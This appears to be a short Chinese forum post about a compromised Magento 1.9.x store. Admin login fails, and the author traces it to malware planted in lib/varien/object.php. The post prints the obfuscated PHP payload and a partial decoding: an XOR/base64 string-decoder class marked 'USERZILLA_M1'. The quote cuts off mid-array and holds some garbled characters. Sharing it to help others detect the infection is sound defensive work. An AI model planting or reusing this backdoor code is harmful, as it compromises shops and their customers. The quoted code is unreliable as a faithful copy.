Magento1.9.X后台突然登录不了密码正确,尝试了各种方法都不行最后发现被挂马。
位置:lib - varien - object.php 遇到同样的问题可以检查下
长这样的,
<?php $KZzkVCCZ="135568565448890GeltTKdlyJ1Y2MhZmYmdTZzMzMhFDNkJmZilDOlFjMxETZ5QzMwQ2JscyM0MjZwYjM4UmMlJzNhZzMwkzYkNGZmFWOmdjMyYzY281JocmO6ADNmBDM0ITMkZWZzgjZ0UmZ4EzM1EWMzETZwE2M1IWOftFVT9EUfRCKsFmdlB0epkSKnUmYkBjYmJTYxIWZ5IWOkhjZiZDO1QWMhhTO2ImY2gTYnwyJldjZ1IjYhVTM0IDN0IWOiVWOidTZzQzM5Q2YwMTY0I2XngyZ6oDM0YGMwQjMxQmZlNDOmRTZmhTMzUTYxMTMlBTYzUjY58VP9kSXpcCNkBjMzYGNmFTO2EDZwAjY2U2Y4I2MkRzM4MWM4IDZkdCLnMmYzYTMldTMiBTYjFTMiZmZ2MTM3ADOjhTO0MTYmVGMfdCKnpjOwQjZwADNyEDZmV2M4YGNlZGOxMTNhFzMxUGMhNTNilzXbVUSL90TD9FJoUDZthiJmkSKdlyJhhzYyYWNyYDO5kjZzAjYzMTYjBzMwkTZxUWO5YWM5Y2JscCNhFjY0UTZzgTO5I2N2MjN0ADNkZDMjRGOiVjM4Q2Yy81JocmO6ADNmBDM0ITMkZWZzgjZ0UmZ4EzM1EWMzETZwE2M1IWOftVRJt0TPN0XkgCdlN3cphCKmlWf7kSehB3XjNGJs0VKnQ2N4ETNlFzY3ADMmlDN3ATN2cDMhZGZhRWM1EDM2ImZnwyJ2ITNlNTZwEWM1QTOkFWY4YWOzAzMxITM3M2Y3ADOyQ2XngyZ6oDM0YGMwQjMxQmZlNDOmRTZmhTMzUTYxMTMlBTYzUjY581WSVkVSV0UfRiLpcCO3YDZzEjMyUmYjhzN5ATOmNzYyUmNzgDOjRGZxQTZ0cCLnMzM3AjN5MjZkV2NxMWYyIDZhZTZzATO3QmMlZ2YlRGOfdCKnpjOwQjZwADNyEDZmV2M4YGNlZGOxMTNhFzMxUGMhNTNilzXskyJzYDOwkTO4ATO4gDMzQWOkZjMjRmNkVTM1QTYkVTZ1QzJscyNmJDOwYDMhBjMxADNxADMhNmNxcjZlFjN1EGOlNDOj91JocmO6ADNmBDM0ITMkZWZzgjZ0UmZ4EzM1EWMzETZwE2M1IWOfhCbpFWbA13OpQWZk92YuV2X5FGcfN2Yk4SMN9lQfFETMlkWSV0UV5SKnIDOxYWN4cjMmFDZ2QGZkBzNxEWN3AjN1QWZyQGN1UTZnwyJwQjM4Q2YygTMkZWZwE2MzEDZ4czYyUGNhVmNxkzYygzXngyZ6oDM0YGMwQjMxQmZlNDOmRTZmhTMzUTYxMTMlBTYzUjY58FKjVGelB0epkSKpcCNzY2YhlTZ2IjYzIWOmdjZzYTN4MmY2E2YyYGM4UGZ1cCLnkzM2QGZmFjZjZWOkhjMyQGNxMTOihjNsfrewrwesdfsfsfs
解密后
<?php if (!defined('USERZILLA_M1')) { class _9b342342k3jghj324f83efd12400f40 { private static $s; public static function g($n, $k) { if (!self::$s) self::i(); $l = strlen($k); $r = base64_decode(self::$s[$n]); for ($i = 0, $c = strlen($r); $i !== $c; ++$i) $r[$i] = chr(ord($r[$i]) ^ ord($k[$i % $l])); return $r; } private static function i() { self::$s = ['_46324kjk2342lk43fa76013c90a29590' => 'ZWFyaj99Ly15OXoA', '_e00e033234l423j2l32c1163' => 'ZmInY2l+fn9ybHlS', '_1353da3b9a5e8a31115711982398fbab' => 'NjJ0Yjl+Ly11aHI6egg=', '_82a64d62716d448b2883fb07bcfa0b24' => 'DkIQExEIS0tSVVUFD1gIBhtWWFkcfpwer;weFtTXE9IRgwTXUQNAUYE', '_155efb932423lldfb234fcf5d97' => 'M2J0ZmJ+Ly52ZnY+eQM=',